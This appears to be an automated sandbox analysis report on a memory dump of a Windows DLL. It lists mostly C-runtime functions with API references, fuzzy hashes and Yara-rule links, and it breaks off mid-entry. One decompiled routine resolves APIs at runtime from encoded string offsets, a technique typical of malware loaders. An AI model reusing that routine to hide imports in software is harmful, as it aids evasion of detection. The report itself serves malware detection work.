Function 6E1A35D0, Relevance: 12.1, APIs: 8, Instructions: 121COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1A35E7

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

DName::isValid.LIBCMTD ref: 6E1A3603
DName::DName.LIBVCRUNTIMED ref: 6E1A3611

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Name::$Name::isNode::makeStatusValid
String ID:
API String ID: 4056879799-0
Opcode ID: 9b6e52b6a4b7f9e92192e37ee2f10fc7bd93ffdab3e1b18700004416b81cd8d3
Instruction ID: dafb377f46e47de5eaa6113fef20ba88366c8cb6c9d2745d2f1d2e711d2a049f
Opcode Fuzzy Hash: 9b6e52b6a4b7f9e92192e37ee2f10fc7bd93ffdab3e1b18700004416b81cd8d3
Instruction Fuzzy Hash: EC41E6B4900114DFCB05DBE8D8A5BFE7778FF11308F000959E6225B280EB70AA85EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199A30, Relevance: 12.1, APIs: 8, Instructions: 51COMMON

Download Yara Rule

APIs

DName::isValid.LIBCMTD ref: 6E199A3C
DName::isEmpty.LIBCMTD ref: 6E199A48
DName::isEmpty.LIBCMTD ref: 6E199A54
DName::operator=.LIBVCRUNTIMED ref: 6E199A69

Part of subcall function 6E199680: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E1996B7

Mailbox.LIBCMTD ref: 6E199A77
DName::isEmpty.LIBCMTD ref: 6E199A81
DName::operator+=.LIBCMTD ref: 6E199AA4

Part of subcall function 6E199C00: DName::isValid.LIBCMTD ref: 6E199C0A
Part of subcall function 6E199C00: DName::isEmpty.LIBCMTD ref: 6E199C16
Part of subcall function 6E199C00: DName::operator=.LIBVCRUNTIMED ref: 6E199C32

DName::append.LIBCMTD ref: 6E199AB4

Part of subcall function 6E198AF0: pairNode::pairNode.LIBCMTD ref: 6E198B26

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name::is$Empty$Name::operator=Valid$MailboxNameName::appendName::operator+=NodeNode::makeNode::pairStatuspair
String ID:
API String ID: 1694665504-0
Opcode ID: a50bae2e5a04cd5d19dcb78220e3e880fd3995275077969029709e1c6631a1f8
Instruction ID: 16f8c1fdbbcb4f22476a0c6b89982bc4102790bc26e71995fed350c98d1a15dd
Opcode Fuzzy Hash: a50bae2e5a04cd5d19dcb78220e3e880fd3995275077969029709e1c6631a1f8
Instruction Fuzzy Hash: 5D111E34A04109EFCB04DFEAD9A5AEDB779EF84244F10446999069F290DF30AEC1FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1967D0, Relevance: 9.1, APIs: 6, Instructions: 148COMMON

Download Yara Rule

APIs

___unDName.LIBVCRUNTIMED ref: 6E196821

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name___un
String ID:
API String ID: 3905892445-0
Opcode ID: 99fe974608bc54288cf45a7638db5cd11bbbb302b37df93ee055160ab61f9d97
Instruction ID: 3c8777653b6f6883e79eb820d0860de6392cc42cff678fda7819158682d9ef0d
Opcode Fuzzy Hash: 99fe974608bc54288cf45a7638db5cd11bbbb302b37df93ee055160ab61f9d97
Instruction Fuzzy Hash: FD510DB1D1010DAFDB04DFE5D890AEEB7B8BF14304F504569E51677290EB346E85EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A2650, Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

DName::getString.LIBCMTD ref: 6E1A26EB

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name::getString
String ID:
API String ID: 1028460119-0
Opcode ID: 85ec252d2414fa8a573ad60e95d3ca57d213bdaa893fd33e20014376f560c225
Instruction ID: 7a2bf5e352fadcd950e4a626cf08253a775f0a9cd45b23e694bf0640475e9b2a
Opcode Fuzzy Hash: 85ec252d2414fa8a573ad60e95d3ca57d213bdaa893fd33e20014376f560c225
Instruction Fuzzy Hash: 87415475D00108EFCB05DFE9D9909FD77F9AF59304F144429E519AB284E7306A84EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19EA30, Relevance: 9.1, APIs: 6, Instructions: 115COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19EA39
DName::DName.LIBVCRUNTIMED ref: 6E19EB0A
operator+.LIBVCRUNTIMED ref: 6E19EB77
Mailbox.LIBCMTD ref: 6E19EB83
Mailbox.LIBCMTD ref: 6E19EB8F
DName::DName.LIBVCRUNTIMED ref: 6E19EBA0

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: MailboxNameName::$Iterator_baseIterator_base::_operator+std::_
String ID:
API String ID: 3503010255-0
Opcode ID: b97b2cf47f63b1570bd0d17487ba15bf2eafd31a7c6e285af6605ff65968b651
Instruction ID: 0e7fc67d4a3dbb1f8a67510431e6bfe843ca9a2f2788a1750726ff197e1143ee
Opcode Fuzzy Hash: b97b2cf47f63b1570bd0d17487ba15bf2eafd31a7c6e285af6605ff65968b651
Instruction Fuzzy Hash: 8F411DB1D01108EFCB05DFE4D9A19DEBBF5BB46305F10416AE5067B294EB305B84EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E16150D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E16150D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E161CC8(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e164144 + 0x6e165014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e164144 + 0x6e165151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E16133D(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e164144 + 0x6e165161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e164144 + 0x6e165174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e164144 + 0x6e165189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e164144 + 0x6e16519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E1615F1(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6e16151b
0x6e16151f
0x6e1615e0
0x6e161525
0x6e16153d
0x6e16154c
0x6e161553
0x6e161555
0x6e16155a
0x6e1615d8
0x6e1615d9
0x6e16155c
0x6e161569
0x6e16156b
0x6e161570
0x00000000
0x6e161572
0x6e16157f
0x6e161581
0x6e161586
0x00000000
0x6e161588
0x6e161595
0x6e161597
0x6e16159c
0x00000000
0x6e16159e
0x6e1615ab
0x6e1615ad
0x6e1615b2
0x00000000
0x6e1615b4
0x6e1615ba
0x6e1615c0
0x6e1615c5
0x6e1615ca
0x6e1615cf
0x00000000
0x6e1615d1
0x6e1615d4
0x6e1615d4
0x6e1615cf
0x6e1615b2
0x6e16159c
0x6e161586
0x6e161570
0x6e16155a
0x6e1615ee

APIs

Part of subcall function 6E161CC8: HeapAlloc.KERNEL32(00000000,?,6E161C03,00000208,00000000,00000000,?,?,?,6E1612A1,?), ref: 6E161CD4

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1616D5,?,?,?,?,?,00000002,?,6E1614D0), ref: 6E161531
GetProcAddress.KERNEL32(00000000,?), ref: 6E161553
GetProcAddress.KERNEL32(00000000,?), ref: 6E161569
GetProcAddress.KERNEL32(00000000,?), ref: 6E16157F
GetProcAddress.KERNEL32(00000000,?), ref: 6E161595
GetProcAddress.KERNEL32(00000000,?), ref: 6E1615AB

Part of subcall function 6E1615F1: memset.NTDLL ref: 6E161670

Memory Dump Source

Source File: 00000000.00000002.590714125.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.590570797.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590742972.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.590764017.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.590805088.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: ff57bdc1bc394128ff6e2013ab38b4e01c5680fd33ec5be65f03bb027e7921a2
Instruction ID: de9d93d1bf96341504789c29cd8aff6dffc12f4db830d1bf712c74c1f4db5031
Opcode Fuzzy Hash: ff57bdc1bc394128ff6e2013ab38b4e01c5680fd33ec5be65f03bb027e7921a2
Instruction Fuzzy Hash: 6D2191B170060FAFDB51DFAAC850D6AB7FCEF563087514425E44AE7201EB30E909EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C470, Relevance: 9.1, APIs: 6, Instructions: 72COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E19C487

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

DName::operator+.LIBCMTD ref: 6E19C4AC
DName::operator+=.LIBCMTD ref: 6E19C4CB
DName::DName.LIBVCRUNTIMED ref: 6E19C4F8

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Name::$Name::operator+Name::operator+=Node::makeStatus
String ID:
API String ID: 2485589204-0
Opcode ID: a5756d75c03ec4d0f164954c4cd31a8cf0294320466a2c210652445e879b3978
Instruction ID: 79f05e6a38ee0462b55cd1dde073b1f469945a2981c6c18210ef64cd0c6f5b9e
Opcode Fuzzy Hash: a5756d75c03ec4d0f164954c4cd31a8cf0294320466a2c210652445e879b3978
Instruction Fuzzy Hash: AA21C4B0A04518DFEB04DBA4D8A5BFE7775AB42304F004458E9565F2C1D771A980FB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D5290, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 221timeCOMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMTD ref: 6E1D5325
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1D5443

Part of subcall function 6E1D61B0: __wcstombs_l.LIBCMTD ref: 6E1D61CD

__invoke_watson_if_error.LIBCMTD ref: 6E1D5510

Strings

?, xrefs: 6E1D534B
*, xrefs: 6E1D5347

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: TimevecTimevec::___invoke_watson_if_error__wcstombs_lstd::_std::exception::exception
String ID: *$?
API String ID: 3210742261-2367018687
Opcode ID: d28e29ffcda279a627dd372eb62050f37e70ece2e2feecfa1bfce6d2371db37d
Instruction ID: fbe8e3fd6d7241e2699a260bfa21051b4e32149d8b5c5a2b0485172816ec0e31
Opcode Fuzzy Hash: d28e29ffcda279a627dd372eb62050f37e70ece2e2feecfa1bfce6d2371db37d
Instruction Fuzzy Hash: A89137B4D1020DEFCB04DFD8D891BEEB7B9EF54308F204569D515AB281EB706A89DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A19C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1A1A20
DName::DName.LIBVCRUNTIMED ref: 6E1A1AA1
Mailbox.LIBCMTD ref: 6E1A1AC1

Strings

_, xrefs: 6E1A1A15
@, xrefs: 6E1A19F4

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: NameName::$Mailbox
String ID: @$_
API String ID: 4073702289-2246572305
Opcode ID: 9497683a32a0bb385cfcaf0f5f52291f6786398da5c7dba9b47acce601832bb5
Instruction ID: 5cf365611a8784b3a5f79580796cde564732e7d1d5bef194bb80681749ce8e30
Opcode Fuzzy Hash: 9497683a32a0bb385cfcaf0f5f52291f6786398da5c7dba9b47acce601832bb5
Instruction Fuzzy Hash: C631A770601D44DFCB05DFB4D5949B97BB6FB42708F145299EA254B380D770A984DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E197F32, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 6E196000: ___vcrt_getptd.LIBVCRUNTIMED ref: 6E196006
Part of subcall function 6E196000: ___vcrt_getptd.LIBVCRUNTIMED ref: 6E19601C

___vcrt_getptd.LIBVCRUNTIMED ref: 6E197F4F
___vcrt_getptd.LIBVCRUNTIMED ref: 6E197F5A
__IsExceptionObjectToBeDestroyed.LIBVCRUNTIMED ref: 6E197FB0
___DestructExceptionObject.LIBCMTD ref: 6E197FD5

Strings

csm, xrefs: 6E197F68

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ___vcrt_getptd$ExceptionObject$DestroyedDestruct
String ID: csm
API String ID: 485384042-1018135373
Opcode ID: 85820ba2ef65f8871fded07e0189c9b3b1de1bc0df06b3eb76070ebbcc715139
Instruction ID: 6c3d48a6a983da433e32be3c284e43b175f01ddbae4c6c4a82189e3b68070785
Opcode Fuzzy Hash: 85820ba2ef65f8871fded07e0189c9b3b1de1bc0df06b3eb76070ebbcc715139
Instruction Fuzzy Hash: 3C211774900209DFCB08CEA4D090BDE7B76BF54309F64846AE8252FA91D734DAC1EBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6E194160, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E194193
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1941A7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1941B7
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1941C2

Strings

csm, xrefs: 6E194188

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: ac5dbc26a0d7ac45ab71ce9f332131f8080732ccad6ebf7e8bec45b6354ad18b
Instruction ID: 6b19668d79311a0d6a8d33be18385fbf7cdecf466f9d2616210a1d3be95576ba
Opcode Fuzzy Hash: ac5dbc26a0d7ac45ab71ce9f332131f8080732ccad6ebf7e8bec45b6354ad18b
Instruction Fuzzy Hash: 8B11C578900209DFCB04DFE8C18059DBBB5FF58344F1189AAD865AB310DB34EA81FB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E19D370, Relevance: 7.6, APIs: 5, Instructions: 149COMMON

Download Yara Rule

APIs

UnDecorator::doMSKeywords.LIBCMTD ref: 6E19D3BE
Mailbox.LIBCMTD ref: 6E19D52F
DName::DName.LIBVCRUNTIMED ref: 6E19D3B9

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

DName::DName.LIBVCRUNTIMED ref: 6E19D540
DName::DName.LIBVCRUNTIMED ref: 6E19D551

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Name::$Decorator::doKeywordsMailboxNode::makeStatus
String ID:
API String ID: 2417761376-0
Opcode ID: e7c0734a57441520053c0f15d8c4200b372bf46810073b72a1fc96331a01d704
Instruction ID: 26441d22f92509ff7eddc1be1af3cde308897458205aacffc6a1926046c511f7
Opcode Fuzzy Hash: e7c0734a57441520053c0f15d8c4200b372bf46810073b72a1fc96331a01d704
Instruction Fuzzy Hash: 485150F1C41208EFEB04DFE4D851ADEBBB5AF15309F14846AE5066A180E7315B84FF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A3330, Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A333C

Part of subcall function 6E1A40B0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A40B9
Part of subcall function 6E1A40B0: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1A4116
Part of subcall function 6E1A40B0: operator+.LIBVCRUNTIMED ref: 6E1A4127
Part of subcall function 6E1A40B0: Mailbox.LIBCMTD ref: 6E1A4133
Part of subcall function 6E1A40B0: Mailbox.LIBCMTD ref: 6E1A4225

Mailbox.LIBCMTD ref: 6E1A33A3
DName::length.LIBVCRUNTIMED ref: 6E1A33BF
DName::getString.LIBCMTD ref: 6E1A33FB

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$Iterator_baseIterator_base::_std::_$DecoratedDecorator::getNameName::getName::lengthStringoperator+
String ID:
API String ID: 245642696-0
Opcode ID: ddf711f6a8c93681d6a5cdcf2c80a70f0e69abccbb550cc95acd04dc88133da6
Instruction ID: 7487fe7d10150ca07ed38cba41640fbcbb4f1e9005a7ce4fc249bc946b01c12d
Opcode Fuzzy Hash: ddf711f6a8c93681d6a5cdcf2c80a70f0e69abccbb550cc95acd04dc88133da6
Instruction Fuzzy Hash: 9941A479D08249EFCB05CFE8C490AFEBBB5AF55304F24809DDA51A7341DB31AA85EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E192D80, Relevance: 7.6, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

___scrt_acquire_startup_lock.LIBCMTD ref: 6E192DDB
___scrt_fastfail.LIBCMTD ref: 6E192DF5
___scrt_dllmain_uninitialize_c.LIBCMTD ref: 6E192DFA
__RTC_Initialize.LIBCMTD ref: 6E192E04
___scrt_uninitialize_crt.LIBCMTD ref: 6E192E36

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Initialize___scrt_acquire_startup_lock___scrt_dllmain_uninitialize_c___scrt_fastfail___scrt_uninitialize_crt
String ID:
API String ID: 485910261-0
Opcode ID: eb4769f70b6f18f906ac4f623addc1f44c6f428537a3d59c0e6540d742e5b819
Instruction ID: dd21ac3d67d5a88e03bd4a3761891e10e2b6f7ffcc5abfc29bb314256165b4dc
Opcode Fuzzy Hash: eb4769f70b6f18f906ac4f623addc1f44c6f428537a3d59c0e6540d742e5b819
Instruction Fuzzy Hash: 9521AC71909619EFDB00DFF5E988B8ABAF9FB02718F000619D0059B280DB794684FBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19EE30, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19EE53
DName::operator+.LIBCMTD ref: 6E19EE92
DName::operator+.LIBCMTD ref: 6E19EEA5
Mailbox.LIBCMTD ref: 6E19EEAE
Mailbox.LIBCMTD ref: 6E19EEBA

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: MailboxName::operator+$Iterator_baseIterator_base::_std::_
String ID:
API String ID: 2657989147-0
Opcode ID: 1c1a1aebfd8c8cf84eae274961692ec8cafa3dc7f56e69bcabf21f95e01a9e23
Instruction ID: ed81212ccfa1585a7fbd2bc78a364eaae5cbbf7b5594c60a381c24dd1a582e02
Opcode Fuzzy Hash: 1c1a1aebfd8c8cf84eae274961692ec8cafa3dc7f56e69bcabf21f95e01a9e23
Instruction Fuzzy Hash: F711F1B5D1020CEFCB04DFE4D851BEEB7BDAB44204F108569E515A7280EB346B44EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D3F90, Relevance: 7.5, APIs: 5, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(6E1D3E89,00000000,00000800,?,?,6E1D3E89,00000000), ref: 6E1D3FA1
GetLastError.KERNEL32(?,?,6E1D3E89), ref: 6E1D3FB5
_wcsncmp.LIBCMTD ref: 6E1D3FCB
_wcsncmp.LIBCMTD ref: 6E1D3FE2
LoadLibraryExW.KERNEL32(6E1D3E89,00000000,00000000,?,?,?,?,6E1D3E89), ref: 6E1D3FF6

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: LibraryLoad_wcsncmp$ErrorLast
String ID:
API String ID: 180994465-0
Opcode ID: a3eccb64b82cd4b857bccd6fa40465da2bc594c413479d8e6030568f9508e74c
Instruction ID: 62864909ff81850ebb8fc41da7af6b1565859de0045132d224bc55a0375f07b0
Opcode Fuzzy Hash: a3eccb64b82cd4b857bccd6fa40465da2bc594c413479d8e6030568f9508e74c
Instruction Fuzzy Hash: DF018175A4420DFBDB109BE1DD4AFDE37BA9B15B00F208410FE09DA285DA74DA88A7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C7F0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 6E199E20: UnDecorator::doUnderScore.LIBCMTD ref: 6E199E26

DName::DName.LIBVCRUNTIMED ref: 6E19C892
DName::operator+=.LIBCMTD ref: 6E19C8A3
Mailbox.LIBCMTD ref: 6E19C8D0

Strings

5, xrefs: 6E19C84B

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Decorator::doMailboxNameName::Name::operator+=ScoreUnder
String ID: 5
API String ID: 3298578019-2226203566
Opcode ID: 18e6528e0055742f654d7c5220a243195ed0acf6e9588231a3d89022f8618d2d
Instruction ID: 2bd41f1943c12923939fe5323e7cec702f6605be9333a92958b6ff7baa283cd1
Opcode Fuzzy Hash: 18e6528e0055742f654d7c5220a243195ed0acf6e9588231a3d89022f8618d2d
Instruction Fuzzy Hash: 962182B1C00209EFCB04DFD4D861AEEBBB5BF55304F144569E5556B290EB306AC4FB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E196D10, Relevance: 6.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMTD ref: 6E196E13
___AdjustPointer.LIBCMTD ref: 6E196E5D
___AdjustPointer.LIBCMTD ref: 6E196F0F
___AdjustPointer.LIBCMTD ref: 6E196EC7

Part of subcall function 6E1AD290: IsProcessorFeaturePresent.KERNEL32(00000017,?,?,6E1CC799,?,?,6E1A5367,?), ref: 6E1AD2D2

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: AdjustPointer$FeaturePresentProcessor
String ID:
API String ID: 3874303849-0
Opcode ID: d3b2e94866b33ca20891b8e6cdc3fc24c14f44d81545c8cc9ddd84cbc7c3feef
Instruction ID: fd413330a16652d9458b2e7a06b6ee53db485e7e6db038356125f315bda3df47
Opcode Fuzzy Hash: d3b2e94866b33ca20891b8e6cdc3fc24c14f44d81545c8cc9ddd84cbc7c3feef
Instruction Fuzzy Hash: EB911A74A1020EDFCB44CF98D494BAA77B6FB59309F208459E8259B390C735ED81EBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D4FC0, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5129660d8727a8c89322bc5d8044a2a813c67d685b2d9b2b1cf538890da326
Instruction ID: 53176e92690e5092eecc611a7ee0832e17907f2137c66bbb0a36fd55edcc0ae9
Opcode Fuzzy Hash: 7d5129660d8727a8c89322bc5d8044a2a813c67d685b2d9b2b1cf538890da326
Instruction Fuzzy Hash: 84313E7061010DEFDB54DFE8D854BDE37B9EF44314F208928E9159B294DB70AE88EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D23F0, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 821d311e9f7d69a52a2b56d9b99727e6cf36b92138f4fa954b92b2ae2c04f870
Instruction ID: 2606e59860a509d8730f5a6f96b71d7524be7e06b266f64a5b8c40c2ea76ec6a
Opcode Fuzzy Hash: 821d311e9f7d69a52a2b56d9b99727e6cf36b92138f4fa954b92b2ae2c04f870
Instruction Fuzzy Hash: E3315270600109EFDB55DFE8D854FDE37B9AF44314F208928E8259B294EB30ADC8EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D5100, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16af6ccf4b36449eeebb8817189dae0e95d9750188127c6110057b86ea801ba
Instruction ID: 1c0963fc61d07a489ed10f1ad390dd8630789bff3f10f9870b45bc91c82af1b3
Opcode Fuzzy Hash: b16af6ccf4b36449eeebb8817189dae0e95d9750188127c6110057b86ea801ba
Instruction Fuzzy Hash: 91312F70A14109EFDB44DFF8D854BDE77BAEF44358F208968E4159B294DB30AD88EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A49F0, Relevance: 6.0, APIs: 4, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(6E1A48F7,00000000,00000800,?,?,6E1A48F7,00000000), ref: 6E1A49FF
GetLastError.KERNEL32(?,?,6E1A48F7), ref: 6E1A4A13
_wcsncmp.LIBCMTD ref: 6E1A4A29
LoadLibraryExW.KERNEL32(6E1A48F7,00000000,00000000,?,6E1A48F7), ref: 6E1A4A3D

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: LibraryLoad$ErrorLast_wcsncmp
String ID:
API String ID: 4169583555-0
Opcode ID: dc8cabc7417da57cf35f6270321f71716a8af500c68ff4afca152f40fa79eb17
Instruction ID: 9fa51e637286ed992c005ef3243150dc8f63224047b5aa246116710bc38cc260
Opcode Fuzzy Hash: dc8cabc7417da57cf35f6270321f71716a8af500c68ff4afca152f40fa79eb17
Instruction Fuzzy Hash: 08F03078A44318FBDB50DEE8DC59F6D37B89B05700F208414FA0A9B285DA719980A7D4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D6E60, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0000FDE9,?), ref: 6E1D6E93

Strings

z, xrefs: 6E1D7167
, xrefs: 6E1D6F64

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Info
String ID: $z
API String ID: 1807457897-2251613814
Opcode ID: 754a93b717b4ab184f6aa1e1a908077dcd626a79b47c5c2f481bfec217762b5e
Instruction ID: f3f123b37a80a18fdc7b8008c8f4118bec3570eedefaedc3c69d8e82b14fe583
Opcode Fuzzy Hash: 754a93b717b4ab184f6aa1e1a908077dcd626a79b47c5c2f481bfec217762b5e
Instruction Fuzzy Hash: BAA11A70A4825C9FDB26CF89C891BE9BB71EB45304F0481D9E94D5B2C2C278AED5DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9370, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 6E1A9444
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1A948D

Strings

, xrefs: 6E1A940F

Memory Dump Source

Source File: 00000000.00000002.590837995.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: TimevecTimevec::_std::_
String ID:
API String ID: 4219598475-3916222277
Opcode ID: 5bf37c226028f2c5c3d6a56b1968b0858f684726df023e28cca1bec28f0c10da
Instruction ID: be243acf960b640b9411a3ea02b6a1da5c9ca046078b2202efae4ec4a591f706
Opcode Fuzzy Hash: 5bf37c226028f2c5c3d6a56b1968b0858f684726df023e28cca1bec28f0c10da
Instruction Fuzzy Hash: C3711CB8E00209DFCB04DFE8D891AEEB7B5BF48304F204559D615BB395DB35A981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19055A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

